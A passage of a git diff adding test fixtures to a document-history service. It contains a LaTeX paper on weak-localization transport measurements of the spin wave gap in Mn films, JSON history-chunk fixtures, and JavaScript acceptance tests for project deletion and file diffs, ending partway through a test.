+\hyphenation{EVTGEN} +\hyphenation{PYTHIA} +\def\be{\begin{equation}} +\def\ee{\end{equation}} +\def\bea{\begin{eqnarray}} +\def\eea{\end{eqnarray}} +%\input{tcilatex} + +\begin{document} + +\title{Transport measurements of the spin wave gap of Mn} +\input author_list.tex +\date{\today} + +\begin{abstract} +Temperature dependent transport measurements on ultrathin antiferromagnetic +Mn films reveal a heretofore unknown non-universal weak localization +correction to the conductivity which extends to disorder strengths greater than +100~k$\Omega$ per square. The inelastic scattering of electrons off of +gapped antiferromagnetic spin waves gives rise to an inelastic scattering +length which is short enough to place the system in the 3D regime. 
The extracted fitting parameters provide estimates of the energy gap ($\Delta
\approx$~16~K) and exchange energy ($\bar{J} \approx$~320~K). %\st{which are in
%agreement with values obtained with other techniques}.
\end{abstract}

\pacs{75}

\maketitle





Thin-film transition metal ferromagnets (Fe, Co, Ni, Gd) and
antiferromagnets (Mn, Cr) and their alloys are not only ubiquitous in
present-day technologies but are also expected to play an important role in
future developments~\cite{thompson_2008}. Understanding magnetism in these
materials, especially when the films are thin enough so that disorder plays
an important role, is complicated by the long-standing controversy about the
relative importance of itinerant and local moments~\cite%
{slater_1936,van_vleck_1953,aharoni_2000}. For the itinerant transition
metal magnets, a related fundamental issue centers on the question of how
itinerancy is compromised by disorder. Clearly, with sufficient disorder the
charge carriers become localized, but questions arise as to what happens to
the spins and associated spin waves and whether the outcome depends on the
ferro/antiferro alignment of spins in the itinerant parent. Ferromagnets,
which have magnetization as the order parameter, are fundamentally different
from antiferromagnets, which have staggered magnetization (i.e., the difference
between the magnetization on each sublattice) as the order parameter~\cite%
{blundell_2001}. Ferromagnetism thus distinguishes itself by having soft
modes at zero wave number, whereas antiferromagnets have soft modes at finite
wave number~\cite{belitz_2005}. Accordingly, the respective spin wave
spectra are radically different. These distinctions are particularly
important when comparing quantum corrections to the conductivity near
quantum critical points for ferromagnets~\cite{paul_2005} and
antiferromagnets~\cite{syzranov_2012}.

Surprisingly, although there have been systematic studies of the effect of
disorder on the longitudinal $\sigma_{xx}$ and transverse $\sigma_{xy}$
conductivity of ferromagnetic films~\cite%
{bergmann_1978,bergmann_1991,mitra_2007,misra_2009,kurzweil_2009}, there
have been few, if any, such studies on antiferromagnetic films. In this paper
we remedy this situation by presenting transport data on systematically
disordered Mn films that are sputter-deposited in a custom-designed vacuum
chamber and then transferred without exposure to air into an adjacent
cryostat for transport studies down to low temperature. The experimental
procedures are similar to those reported previously: disorder, characterized
by the sheet resistance $R_0$ measured at $T=$~5~K, can be changed either by
growing separate samples or by gentle annealing of a given sample through
incremental stages of disorder~\cite{misra_2011}. Using these same procedures,
our results for antiferromagnets are, however, decidedly different. The data
are well described over a large range of disorder strengths by a non-universal
three-dimensional (3d) quantum correction that applies only to spin wave gapped
antiferromagnets. This finding implies the presence of strong inelastic
electron scattering off of antiferromagnetic spin waves. The theory is
validated not only by good fits to the data but also by extraction from the
fitting parameters of a value for the spin wave gap $\Delta$ that is in
agreement with the value expected for Mn.
On the other hand, the
+exchange energy $\bar{J}$ could be sensitive to the high disorder in our
+ultrathin films, and it turns out to be much smaller than the known values.

In previous work, the inelastic scattering of electrons off of spin waves has
been an essential ingredient in understanding disordered ferromagnets. For
example, to explain the occurrence of weak-localization corrections to the
anomalous Hall effect in polycrystalline Fe films~\cite{mitra_2007}, it was
necessary to invoke a contribution to the inelastic phase breaking rate $%
\tau_{\varphi}^{-1}$ due to spin-conserving inelastic scattering off
spin-wave excitations. This phase breaking rate, anticipated by theory~\cite%
{tatara_2004} and seen experimentally in spin-polarized electron energy-loss
spectroscopy (SPEELS) measurements of ultrathin Fe films~\cite%
{plihal_1999,zhang_2010}, is linear in temperature and significantly larger
than the phase breaking rate due to electron-electron interactions, thus
allowing a wide temperature range in which to observe weak localization
corrections~\cite{mitra_2007}. The effect of a high $\tau_{\varphi}^{-1}$ due to
inelastic scattering off spin-wave excitations is also seen in Gd films,
where, in addition to a localizing log($T$) quantum correction to the
conductance, a localizing linear-in-$T$ quantum correction is present and is
interpreted as a spin-wave mediated Altshuler-Aronov-type correction to the
conductivity~\cite{misra_2009}.

Interestingly, this high rate of inelastic spin-wave scattering becomes even
more important for the thinnest films, as shown in theoretical calculations
on Fe and Ni, which point to extremely short spin-dependent inelastic mean
free paths~\cite{hong_2000}, and in SPEELS measurements on
few-monolayer-thick Fe/W(110) films, in
which a strong nonmonotonic enhancement of localized spin wave energies is
found for the thinnest films~\cite{zhang_2010}.

Inelastic spin wave scattering in highly disordered ferromagnetic films can
be strong enough to ensure that the associated $T$-dependent dephasing
length $L_{\varphi }(T)=\sqrt{D\tau _{\varphi }}$ (with $D$ the diffusion
constant)~\cite{lee_1985} is less than the film thickness $t$, thus putting
thin films into the 3d limit, where a metal-insulator
transition is observed~\cite{misra_2011}. Recognizing that similarly high
inelastic scattering rates must apply to highly disordered antiferromagnetic
films, we first proceed with a theoretical approach that takes into account
the effect of scattering off antiferromagnetic spin waves on the phase
relaxation rate, and we find a heretofore unrecognized non-universal 3d weak
localization correction to the conductivity that allows an interpretation of
our experimental results.

We mention in passing that the 3d interaction-induced quantum correction,
which is dominant in the case of ferromagnetic Gd
films that undergo a metal-insulator transition~\cite{misra_2011}, is
much smaller in the present case and will not be considered further (for an
estimate of this contribution, see Ref.~\cite{muttalib_unpub}).

As discussed in detail in Ref.~[\onlinecite{wm10}], the phase relaxation
time $\tau _{\varphi }$ limits the phase coherence in a particle-particle
diffusion propagator $C(q,\omega )$ (Cooperon) in the form
\begin{equation}
C(q,\omega _{l})=\frac{1}{2\pi N_{0}\tau ^{2}}\frac{1}{Dq^{2}+|\omega
_{l}|+1/\tau _{\varphi }},
+\end{equation}
where $N_{0}$ is the density of states at the Fermi level, $\tau $ is the
elastic scattering time, and $\omega _{l}=2\pi lT$ is the Matsubara
frequency. Labeling the Cooperon propagator in the absence of interactions
as $C_{0}$, we can write
\begin{equation}
\frac{1}{\tau _{\varphi }}=\frac{1}{2\pi N_{0}\tau ^{2}}[C^{-1}-C_{0}^{-1}].
\end{equation}

In general, $C(q,\omega )$ can be evaluated diagrammatically in the presence
of interactions and disorder in a ladder approximation \cite{fa} that can be
symbolically written as $C=C_{0}+C_{0}KC$, where the interaction vertex $K$
contains self-energy as well as vertex corrections due to both interactions
and disorder. It then follows that $1/\tau _{\varphi }$ is given by
\begin{equation}
\frac{1}{\tau _{\varphi }}=-\frac{1}{2\pi N_{0}\tau ^{2}}K.
\end{equation}%
In Ref.~[\onlinecite{wm10}], the leading temperature and disorder dependence
of the inelastic diffusion propagator was evaluated diagrammatically, in the
presence of ferromagnetic spin-wave-mediated electron-electron interactions.
Here we consider the antiferromagnetic case. We consider only the case of a
large spin-wave gap, where the damping can be ignored. Using the antiferromagnetic
dispersion relation $\omega _{q}=\Delta +Aq$, where $A$ is the spin
stiffness, the inelastic lifetime is given by
\be
\frac{\hbar }{\tau _{\varphi }}=\frac{4}{\pi \hbar }nJ^{2}\int_{0}^{1/l}%
\frac{q^{d-1}dq}{\sinh \beta \omega _{q}}\frac{Dq^{2}+1/\tau _{\varphi }}{%
(Dq^{2}+1/\tau _{\varphi })^{2}+\omega _{q}^{2}},
\ee%
where $n=k_{F}^{3}/3\pi ^{2}$ is the 3d density, $J$ is the effective
spin-exchange interaction, and $\beta =1/k_{B}T$. Here we will consider the
limit $\hbar /\tau _{\varphi }\ll \Delta $, relevant for our experiment on
Mn. In this limit, we can neglect the $1/\tau _{\varphi }$ terms inside the
integral. The upper limit of the integral should be restricted to $\Delta /A$
when $\Delta /A<1/l$. For large disorder, we expect the parameter $x\equiv
\hbar Dk_{F}^{2}\Delta / \bar{J}^{2}\ll 1$, where the spin-exchange energy
is given by $\bar{J}=Ak_{F}$. In this limit, $L_{\varphi }$ can be
simplified as
\be
k_{F}L_{\varphi }\approx \left( \frac{\bar{J}}{\Delta }\right) ^{3/2}\left(
\frac{5\sinh \frac{\Delta }{T}}{12\pi }\right) ^{1/2},\;\;\;x\ll 1
\label{L-phi-3d}
\ee%
which is independent of $x$ and therefore independent of disorder.

Given the inelastic lifetime, the weak localization correction in 3d is
usually given by \cite{lee_1985} $\delta \sigma _{3d}=\frac{e^{2}}{\hbar \pi
^{3}}\frac{1}{L_{\varphi }},$ where the prefactor to the inverse inelastic
length is a universal number, independent of disorder. However, at large
enough disorder, we show that there exists a disorder-dependent correction,
due to the scale-dependent diffusion coefficient near the Anderson
metal-insulator transition. In fact, the diffusion coefficient obeys the
self-consistent equation \cite{WV}
\begin{equation}
\frac{D_{0}}{D(\omega )}=1+\frac{k_{F}^{2-d}}{\pi m}\int_{0}^{1/l}dQ\frac{%
Q^{d-1}}{-i\omega +D(\omega )Q^{2}},
\end{equation}%
where $D_{0}=v_{F}l/d$ is the diffusion coefficient at weak disorder. While
the significance of the prefactor to the integral is not clear, the above
equation remains qualitatively accurate over a wide range near the Anderson
transition.
Setting $\omega =i/\tau _{\varphi }$ and doing the $Q$-integral
in 3d,
\bea
\frac{D_{0}}{D} &\approx & 1+\frac{1}{\pi mk_{F}}\int_{1/L_{\varphi }}^{1/l}dQ\frac{%
Q^{2}}{DQ^{2}}\cr
&=& 1+\frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}-\delta
\left( \frac{D_{0}}{D}\right) ,
\label{delta}
\eea%
where
\bea
\delta \equiv \frac{D_{0}}{D}\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{%
L_{\varphi }}
\eea
is assumed to be a small correction, and Eq.~(\ref{delta})
should not be solved self-consistently. This follows from the fact that the
diffusion coefficient of electrons at fixed energy entering the Cooperon
expression is that of non-interacting electrons, and is given by the limit $%
T\rightarrow 0$, $L_{\varphi }\rightarrow \infty $, and therefore $\delta
\rightarrow 0$. Then the correction at finite $T$ is given by
\bea
\frac{D}{D_{0}} &=& \frac{1}{\left( \frac{D_{0}}{D}\right) _{0}-\delta \left(
\frac{D_{0}}{D}\right) }\cr
&\approx & \left( \frac{D}{D_{0}}\right) _{0}+\left( \frac{D}{D_{0}}\right) _{0}
\frac{3}{\pi k_{F}^{2}l^{2}}\frac{l}{L_{\varphi }}%
\eea%
where
\be
\lim_{T\rightarrow 0}\frac{D}{D_{0}}\equiv \left( \frac{D}{D_{0}}\right)
_{0}.
\ee%
Using the relation $\sigma _{3d}=(e^{2}/\hbar )nD$, where the longitudinal
sheet conductance is $\sigma _{\square }=\sigma _{3d}t$, with $t$ being the
film thickness, we finally get the temperature-dependent weak localization
correction term
\bea
\frac{\delta \sigma _{\square }}{L_{00}} &=& \left( \frac{D}{D_{0}}\right) _{0}%
\frac{2}{\pi }\frac{t}{L_{\varphi }}\cr
\left( \frac{D}{D_{0}}\right)_{0} &\approx &\frac{2}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}}
\label{WL}
\eea%
where $R_{0}=L_{00}/\sigma _{\square }(T$=$0)$, $L_{00}=e^{2}/\pi h$, $%
a=3\pi /(2k_{F}tb_{0})$, $b_{0}$ is a number of order unity, and we
have solved the self-consistent equation for $D$ in order to express $D_{0}$
in terms of $D$ and finally $R_{0}$. Thus in this case, the weak
localization correction has a prefactor which is not universal. While this
reduces to the well-known universal result at weak disorder $R_{0}\ll a$, it
becomes dependent on disorder, characterized by the sheet resistance $R_{0}$,
at strong disorder, and at the same time substantially extends the 3d regime
near the transition.

Substituting the expression for $L_{\varphi }$ (Eq.~(\ref{L-phi-3d})) into
Eq.~(\ref{WL}), we finally obtain the total conductivity, including the
quantum correction to the conductivity due to weak localization in 3d
arising from scattering of electrons off antiferromagnetic spin waves in Mn,
\begin{equation}
\frac{\sigma _{\square }}{L_{00}}=A+\frac{B}{\sqrt{\sinh [\Delta /T]}},
\label{sigmaWL}
\end{equation}%
where the parameter $A$ is temperature independent and the parameter
\bea
B &\equiv & \left( \frac{D}{D_{0}}\right) _{0}\frac{2}{\pi ^{2}}\left( \frac{%
12\pi }{5}\right) ^{1/2}\left( \frac{\Delta }{\bar{J}}\right) ^{3/2}tk_{F}\cr%
&=&\frac{2c}{1+\sqrt{1+\frac{4R_{0}^{2}}{a^{2}}}},
\label{BFit}
\eea%
where
\be
c\equiv \left( \frac{\Delta }{\bar{J}}\right) ^{3/2}\left( \frac{%
48t^{2}k_{F}^{2}}{5\pi}\right) ^{1/2}.
\label{cFit}
\ee

The data presented here are for a single film prepared with an initial $R_0
\approx$~6~k$\Omega$. Disorder was subsequently increased in incremental
stages up to 180~k$\Omega$ by annealing at approximately 280~K~\cite%
{misra_2011}. Additional samples were grown at intermediate disorder and
measured to check reproducibility.
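For orientation (an illustrative evaluation, not an additional fit,
anticipating the best-fit values $c=0.67$ and $a=28$~k$\Omega$ obtained
below), Eq.~(\ref{BFit}) gives for the two samples discussed next
\be
B=\frac{2c}{1+\sqrt{1+4R_{0}^{2}/a^{2}}}\approx 0.51\;\;(R_{0}=17573~\Omega ),
\qquad B\approx 0.24\;\;(R_{0}=63903~\Omega ),
\ee%
so that at $T=\Delta $ the temperature-dependent term
$B/\sqrt{\sinh (\Delta /T)}$ is of order $B$, substantially smaller than the
temperature-independent term $A\approx 1/L_{00}R_{0}$.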
+
+Figure~\ref{fig:cond} shows the conductivity data for two samples with
disorder $R_{0}=$~17573~$\Omega $ and 63903~$\Omega $, together with the
corresponding fits to expression~(\ref{sigmaWL}), where $A$ and $B$ are taken as
fitting parameters and $\Delta =$~16~K is the spin wave gap. The fits are
sensitive to the parameters $A$ and $B$ but relatively insensitive to $%
\Delta $. We find that $\Delta =$~16~$\pm $~4~K provides good fits in
the whole range of disorder (from 6 to 180~k$\Omega $).

\begin{figure}[tbp]
\begin{center}
\includegraphics[width=9cm]{fig_1_16.eps}
\end{center}
\caption{The temperature-dependent normalized conductivity (open squares)
for two samples with the indicated disorder strengths of $R_0 =$~17573~$%
\Omega$ and 63903~$\Omega$ shows good agreement with theory (solid lines).
The fitting parameters $A$ and $B$ are indicated for each curve with the
error in the least significant digit indicated in parentheses.}
\label{fig:cond}
\end{figure}

Figure~\ref{fig:parb} shows the dependence of the parameter $B$ on the
disorder strength $R_0$ (open squares) and a theoretical fit (solid line)
using Eq.~(\ref{BFit}), where $c$ and $a$ are fitting parameters. The solid
line for this two-parameter fit is drawn for the best-fit values $c=0.67 \pm
0.04$ and $a= 28 \pm 3$~k$\Omega$. We note that the fit is of reasonable
quality over most of the disorder range except for the film with the least
disorder ($R_0 = 6$~k$\Omega$), where $B = 0.77$ lies
somewhat above the saturated value
$B = c = 0.67$ evaluated from Eq.~(\ref{BFit}) at $R_0 = 0$. Using higher
values of $c$ (e.g., $c=0.8$) and lower values of $a$ (e.g., $a = 22$~k$\Omega$)
improves the fit at low disorder strengths but
increases the discrepancy at higher disorder strengths.

%L_phi/t = 2/pi*2/(1+sqrt(1+16))/0.5, 2/pi*2/(1+sqrt(1+1))/0.25

%http://hyperphysics.phy-astr.gsu.edu/hbase/tables/fermi.html , k_F = sqrt(2*m_e*(10.9 eV))/(hbar) = 1.7E10 1/m

% (bar(J) / \Delta) ^ 3/2 = (48*(2e-9)^2*(2.7e9)^2/5/pi/(0.65)^2) ^0.5 = 8360 = 20 ^ 3
%A = \bar{J} / k_F , \bar{J} = nJ

Substituting the Fermi energy for bulk Mn~\cite{ashcroft_1976},
a thickness $t=2$~nm known to 20\% accuracy, together with the best-fit
value for $c$ into Eq.~(\ref{cFit}), we calculate the value $\bar{J} =$~320~$%
\pm$~93~K. Gao et al.~\cite{gao_2008} performed inelastic scanning tunneling
spectroscopy (ISTS) on thin Mn films and reported $\Delta$ in the range from
30 to 60~K and $\bar{J}=vk_F=$~3150~$\pm$~200~K. The agreement of energy gaps is
good; however, our significantly lower value of $\bar{J}$ is probably due to the
high disorder in our ultrathin films.

Since the temperature-dependent correction $B/\sqrt{\sinh (\Delta /T)}$ of
Eq.~(\ref{sigmaWL}) is small compared to the parameter $A$, we can write
$\sigma_{\square} \approx 1/R_0$ so that Eq.~(\ref{sigmaWL}) reduces to the
expression $A \approx 1/L_{00}R_0$. Taking the logarithm of both sides of
this approximation yields the plot shown in the inset of
Fig.~\ref{fig:parb}. The slope of $-1$ confirms the linear dependence of $A$ on
$1/R_0$, and the intercept of 5.01 (10$^{5.01}\approx $~102~k$\Omega$) is
within 20\% of the expected theoretical value $1/L_{00}=$~81~k$\Omega $
for the inverse normalization constant. Accordingly, the conductivity corrections in
Eq.~(\ref{sigmaWL}) are small compared to the zero-temperature conductivity, and
the normalization constant $L_{00}$ for the conductivity is close to the
expected theoretical value.
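As a worked check of the intercept (with $R_0$ measured in ohms), taking
logarithms of $A \approx 1/L_{00}R_0$ gives
\be
\log _{10}A\approx \log _{10}\frac{1}{L_{00}}-\log _{10}R_{0},\qquad
\frac{1}{L_{00}}=\frac{\pi h}{e^{2}}\approx 8.1\times 10^{4}~\Omega ,
\ee%
so the predicted intercept is $\log _{10}(8.1\times 10^{4})\approx 4.91$,
to be compared with the measured intercept of 5.01.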
+
+Using Eq.~(\ref{WL}) and the obtained value for $a\approx $~28~k$\Omega $, we can
compare the dephasing length ($L_{\varphi }$) with the thickness ($t\approx $%
~2~nm) at 16~K. For the sample with $R_{0}=$~63903~$\Omega $ the ratio $%
L_{\varphi }/t\approx $~0.5, and for the sample with $R_{0}=$~17573~$\Omega $
$L_{\varphi }/t\approx $~2. The latter estimate assumes no spin
polarization, while a full polarization would imply $L_{\varphi }/t\approx $%
~1. Thus $L_{\varphi }$ is smaller than or close to the thickness of the
film, which keeps the film in the three-dimensional regime for almost all
temperatures and disorder strengths considered.

\begin{figure}[tbp]
\begin{center}
\includegraphics[width=9cm]{fig_2_16.eps}
\end{center}
\caption{Dependence of the fitting parameters $B$ and $A$ (inset) on
disorder $R_0$ for $\Delta=$~16~K. The fitting parameters are indicated for
each curve with the error in the least significant digit indicated in
parentheses.}
\label{fig:parb}
\end{figure}

In conclusion, we have performed \textit{in situ} transport measurements on
ultrathin Mn films, systematically varying the disorder ($R_{0}=R_{xx}$($T=$%
~5~K)). The obtained data were analyzed within a weak localization theory in
3d generalized to strong disorder. In the temperature range considered,
inelastic scattering off spin waves is found to be strong, giving rise to a
dephasing length shorter than the film thickness, which places these systems
into the 3d regime. The obtained value for the spin wave gap was close to
the one measured by Gao et al.~\cite{gao_2008} using ISTS, while the
exchange energy was much smaller.

This work has been supported by the NSF under Grant No.~1305783 (AFH).
PW thanks A.\ M.\ Finkel'stein for useful discussions and acknowledges
partial support through the DFG research unit ``Quantum phase transitions''.
+ +\bibliographystyle{apsrev} +\bibliography{bibl} + +\end{document} diff --git a/services/project-history/test/acceptance/fixtures/chunks/0-3.json b/services/project-history/test/acceptance/fixtures/chunks/0-3.json new file mode 100644 index 0000000..51441cf --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/chunks/0-3.json @@ -0,0 +1,74 @@ +{ + "chunk": { + "history": { + "snapshot": { + "files": { + "bar.tex": { + "hash": "4f785a4c192155b240e3042b3a7388b47603f423", + "stringLength": 26 + }, + "main.tex": { + "hash": "f28571f561d198b87c24cc6a98b78e87b665e22d", + "stringLength": 20638, + "metadata": { + "main": true + } + } + } + }, + "changes": [ + { + "operations": [ + { + "pathname": "main.tex", + "textOperation": [ + 1912, + "Hello world", + 18726 + ] + } + ], + "timestamp": "2017-12-04T10:23:35.633Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "bar.tex", + "newPathname": "foo.tex" + } + ], + "timestamp": "2017-12-04T10:27:26.874Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "foo.tex", + "textOperation": [ + 26, + "\n\nFour five six" + ] + } + ], + "timestamp": "2017-12-04T10:28:33.724Z", + "authors": [ + 31 + ] + } + ] + }, + "startVersion": 0 + }, + "authors": [ + { + "id": 31, + "email": "james.allen@overleaf.com", + "name": "James" + } + ] +} \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/chunks/4-6.json b/services/project-history/test/acceptance/fixtures/chunks/4-6.json new file mode 100644 index 0000000..24040cf --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/chunks/4-6.json @@ -0,0 +1,74 @@ +{ + "chunk": { + "history": { + "snapshot": { + "files": { + "main.tex": { + "hash": "35c9bd86574d61dcadbce2fdd3d4a0684272c6ea", + "stringLength": 20649, + "metadata": { + "main": true + } + }, + "foo.tex": { + "hash": "c6654ea913979e13e22022653d284444f284a172", + "stringLength": 41 + } + } + }, + "changes": [ + { + "operations": [ + { + "pathname": "foo.tex", + "textOperation": [ + 41, + "\n\nSeven eight nince" + ] + } + ], + "timestamp": "2017-12-04T10:29:17.786Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "foo.tex", + "textOperation": [ + 58, + -1, + 1 + ] + } + ], + "timestamp": "2017-12-04T10:29:22.905Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "foo.tex", + "newPathname": "bar.tex" + } + ], + "timestamp": "2017-12-04T10:29:26.120Z", + "authors": [ + 31 + ] + } + ] + }, + "startVersion": 3 + }, + "authors": [ + { + "id": 31, + "email": "james.allen@overleaf.com", + "name": "James" + } + ] +} \ No newline at end of file diff --git a/services/project-history/test/acceptance/fixtures/chunks/7-8.json b/services/project-history/test/acceptance/fixtures/chunks/7-8.json new file mode 100644 index 0000000..4325abc --- /dev/null +++ b/services/project-history/test/acceptance/fixtures/chunks/7-8.json @@ -0,0 +1,63 @@ +{ + "chunk": { + "history": { + "snapshot": { + "files": { + "main.tex": { + "hash": "35c9bd86574d61dcadbce2fdd3d4a0684272c6ea", + "stringLength": 20649, + "metadata": { + "main": true + } + }, + "bar.tex": { + "hash": "e13c315d53aaef3aa34550a86b09cff091ace220", + "stringLength": 59 + } + } + }, + "changes": [ + { + "operations": [ + { + "pathname": "main.tex", + "textOperation": [ + 1923, + " also updated", + 18726 + ] + } + ], + "timestamp": "2017-12-04T10:32:47.277Z", + "authors": [ + 31 + ] + }, + { + "operations": [ + { + "pathname": "bar.tex", + "textOperation": [ + 28, + -15, + 16 + ] + 
} + ], + "timestamp": "2017-12-04T10:32:52.877Z", + "v2Authors": [ + "5a5637efdac84e81b71014c4" + ] + } + ] + }, + "startVersion": 6 + }, + "authors": [ + { + "id": 31, + "email": "james.allen@overleaf.com", + "name": "James" + } + ] +} \ No newline at end of file diff --git a/services/project-history/test/acceptance/js/DeleteProjectTests.js b/services/project-history/test/acceptance/js/DeleteProjectTests.js new file mode 100644 index 0000000..dcda54a --- /dev/null +++ b/services/project-history/test/acceptance/js/DeleteProjectTests.js @@ -0,0 +1,83 @@ +import { expect } from 'chai' +import nock from 'nock' +import mongodb from 'mongodb-legacy' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('Deleting project', function () { + beforeEach(function (done) { + this.projectId = new ObjectId().toString() + this.historyId = new ObjectId().toString() + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: this.historyId } }, + }) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + MockHistoryStore().delete(`/api/projects/${this.historyId}`).reply(204) + ProjectHistoryApp.ensureRunning(done) + }) + + describe('when the project has no pending updates', function (done) { + it('successfully deletes the project', function (done) { + ProjectHistoryClient.deleteProject(this.projectId, done) + }) + }) + + describe('when the project has pending updates', function (done) { + beforeEach(function (done) { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + { + pathname: '/main.tex', + docLines: 'hello', + doc: this.docId, + meta: { userId: this.userId, ts: new Date() }, + }, + err => { + if (err) { + return done(err) + } + ProjectHistoryClient.setFirstOpTimestamp( + this.projectId, + Date.now(), + err => { + if (err) { + return done(err) + } + ProjectHistoryClient.deleteProject(this.projectId, done) + } + ) + } + ) + }) + + it('clears pending updates', function (done) { + ProjectHistoryClient.getDump(this.projectId, (err, dump) => { + if (err) { + return done(err) + } + expect(dump.updates).to.deep.equal([]) + done() + }) + }) + + it('clears the first op timestamp', function (done) { + ProjectHistoryClient.getFirstOpTimestamp(this.projectId, (err, ts) => { + if (err) { + return done(err) + } + expect(ts).to.be.null + done() + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/DiffTests.js b/services/project-history/test/acceptance/js/DiffTests.js new file mode 100644 index 0000000..b62e32d --- /dev/null +++ b/services/project-history/test/acceptance/js/DiffTests.js @@ -0,0 +1,415 @@ +import { expect } from 'chai' +import request from 'request' +import crypto from 'node:crypto' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +function createMockBlob(historyId, content) { + const sha = 
crypto.createHash('sha1').update(content).digest('hex') + MockHistoryStore() + .get(`/api/projects/${historyId}/blobs/${sha}`) + .reply(200, content) + .persist() + return sha +} + +describe('Diffs', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + + this.historyId = new ObjectId().toString() + this.projectId = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: this.historyId } }, + }) + + ProjectHistoryClient.initializeProject(this.historyId, error => { + if (error) { + return done(error) + } + done() + }) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + it('should return a diff of the updates to a doc from a single chunk', function (done) { + this.blob = 'one two three five' + this.sha = createMockBlob(this.historyId, this.blob) + this.v2AuthorId = '123456789' + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: this.sha, + stringLength: this.blob.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [4, -4, 15], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [19, ' six'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + v2Authors: [this.v2AuthorId], + }, + ], + }, + startVersion: 3, + }, + authors: [31], + }) + + ProjectHistoryClient.getDiff( + this.projectId, + 'foo.tex', + 3, + 6, + (error, diff) => { + if (error) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + u: 'one ', + }, + { + d: 'two ', + meta: { + users: [31], + start_ts: 1512383362905, + end_ts: 1512383362905, + }, + }, + { + u: 'three', + }, + { + i: ' four', + meta: { + users: [31], + start_ts: 1512383357786, + end_ts: 1512383357786, + }, + }, + { + u: ' five', + }, + { + i: ' six', + meta: { + users: [this.v2AuthorId], + start_ts: 1512383366120, + end_ts: 1512383366120, + }, + }, + ], + }) + done() + } + ) + }) + + it('should return a diff of the updates to a doc across multiple chunks', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: createMockBlob(this.historyId, 'one two three five'), + stringLength: 'one three four five'.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [4, -4, 15], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: createMockBlob(this.historyId, 'one three four five'), + stringLength: 'one three four five'.length, + }, + }, + }, + changes: [ + { + operations: [ 
+ { + pathname: 'foo.tex', + textOperation: [19, ' six'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [23, ' seven'], + }, + ], + timestamp: '2017-12-04T10:29:26.120Z', + authors: [31], + }, + ], + }, + startVersion: 5, + }, + authors: [{ id: 31, email: 'james.allen@overleaf.com', name: 'James' }], + }) + + ProjectHistoryClient.getDiff( + this.projectId, + 'foo.tex', + 4, + 6, + (error, diff) => { + if (error) { + throw error + } + expect(diff).to.deep.equal({ + diff: [ + { + u: 'one ', + }, + { + d: 'two ', + meta: { + users: [31], + start_ts: 1512383362905, + end_ts: 1512383362905, + }, + }, + { + u: 'three four five', + }, + { + i: ' six', + meta: { + users: [31], + start_ts: 1512383366120, + end_ts: 1512383366120, + }, + }, + ], + }) + done() + } + ) + }) + + it('should return a 404 when there are no changes for the file in the range', function (done) { + this.blob = 'one two three five' + this.sha = createMockBlob(this.historyId, this.blob) + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + 'foo.tex': { + hash: this.sha, + stringLength: this.blob.length, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'foo.tex', + textOperation: [13, ' four', 5], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + ], + }, 